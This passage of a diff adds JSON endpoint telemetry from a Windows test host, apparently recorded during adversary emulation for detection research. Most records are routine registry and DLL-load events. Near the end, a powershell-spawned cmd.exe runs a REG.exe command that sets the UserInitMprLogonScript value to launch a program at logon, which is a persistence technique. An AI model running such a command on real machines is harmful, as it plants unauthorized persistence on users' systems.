"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cellulardatacapabilityhandler.dll", + "image_path": "C:\\Windows\\System32\\cellulardatacapabilityhandler.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wwapi.dll", + "image_path": "C:\\Windows\\System32\\wwapi.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4436, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573253050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": 
"cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573252920000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573252920000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "command_line": "REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6488, + "ppid": 4436, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883573253160000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}", + 
